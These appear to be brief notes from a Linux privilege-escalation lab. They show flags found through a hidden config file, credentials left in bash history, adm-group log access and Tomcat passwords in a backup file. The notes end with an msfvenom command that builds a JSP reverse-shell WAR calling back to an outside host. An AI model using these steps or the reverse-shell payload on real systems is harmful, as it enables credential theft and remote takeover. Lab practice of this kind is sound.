Flag1:
.config/.flag1.txt
Flag2:
/home/barry/.bash_history
mysql -u root -p
tmux new -s barry
sshpass -p 'i_l0ve_s3cur1ty!' ssh [email protected]
LLPE{ch3ck_th0se_cmd_l1nes!}
Flag3:
id
uid=1001(barry) gid=1001(barry) groups=1001(barry),4(adm)
find / -type f -group adm -exec ls -l {} \\; 2> /dev/null
...
-rw-r----- 1 root adm 23 Sep 5 2020 /var/log/flag3.txt
LLPE{h3y_l00k_a_fl@g!}
Flag4:
cat /etc/tomcat9/tomcat-users.xml.bak
<user username="tomcatadm" password="T0mc@t_s3cret_p@ss!" roles="manager-gui, manager-script, manager-jmx, manager-status, admin-gui, admin-script"/>
Then we can upload the war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.24 LPORT=4443 -f war > backup.war